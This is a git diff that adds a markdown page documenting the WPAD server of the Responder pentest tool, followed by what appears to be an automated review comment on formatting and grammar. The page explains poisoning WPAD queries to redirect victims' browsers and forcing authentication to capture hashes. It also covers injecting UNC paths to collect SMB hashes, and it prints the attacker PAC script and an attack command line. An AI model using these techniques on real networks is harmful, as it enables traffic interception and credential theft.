diff --git a/WPAD.md b/WPAD.md new file mode 100644 index 0000000..39df5ef --- /dev/null +++ b/WPAD.md 
@@ -0,0 +1,42 @@ +# Responder WPAD Server + +WPAD stands for Web Proxy Auto-Discovery or Proxy Auto-Configuration (PAC). + +This protocol was implemented on Internet Explorer 5.0, and the concept is to auto-configure local proxy servers on the user browser. + +There is several way to configure a WPAD: +* Manually insert a WPAD server in IE -> Options -> Connection Settings -> Lan Settings. +* DHCP options 252. +* Multicast/Broadcast WPAD lookup. + +Responder takes advantage of that and effectively poison WPAD broadcast/multicast queries and redirect the victim browser to its WPAD server. + +Here there is two scenario: +* Force authentication when serving the WPAD file (Responder switch -F) and grab hash. + * Once the authentication has been grabbed, all browser request will be proxy-ed by Responder. +* Just serve the file, then proxy all browser requests. + +Responder WPAD script is specified in Responder.conf and should be changed for your needs (at least the hardcoded name "ProxySrv"): +> WPADScript = + function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';} + +This function contains the following directives: + +* Use a proxy server for all connections. + +* Responder proxy server is set to ProxySrv:3141 and ProxySrv:3128 + +* For any *.ProxySrv requests or if the request is for localhost/127.0.0.1, don't use the proxy. + +* If this proxy server fails for whatever reason, then access the website directly. + +Once the requests goes through Responder proxy, a UNC inside a tag is inserted on all requests to grab SMB hashes. +This payload can be changed in Responder.conf with the setting "HTMLToInject =". + +Responder WPAD proxy server gets activated by providing the "-w" command line switch. 
+ +Forcing WPAD file authentication is with the "-F" command line switch. + +Example: + + ./Responder.py -I eth0 -rFwv
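Review bot: the WPADScript excerpt is shown as a markdown blockquote (`> WPADScript =`) with the whole PAC function on the next line, which renders as one run-together paragraph; put the `function FindProxyForURL(url, host){...}` body in a fenced code block so readers can see the three branches (DIRECT for localhost/plain hostnames, DIRECT for ProxySrv itself, and `'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT'` for everything else), and note that the trailing `DIRECT` in that return value is what the last bullet ("If this proxy server fails ... access the website directly") refers to. The bullet listing the proxies as "ProxySrv:3141 and ProxySrv:3128" also reverses the order the script actually tries them in; match the script. The example `./Responder.py -I eth0 -rFwv` uses `-r` and `-v`, which this file never explains, so either drop them from the example or describe them next to the `-w` and `-F` descriptions. Grammar: "There is several way" -> "There are several ways", "DHCP options 252" -> "DHCP option 252", "Here there is two scenario" -> "Here there are two scenarios", "all browser request will be proxy-ed" -> "all browser requests will be proxied", "Once the requests goes" -> "Once the requests go".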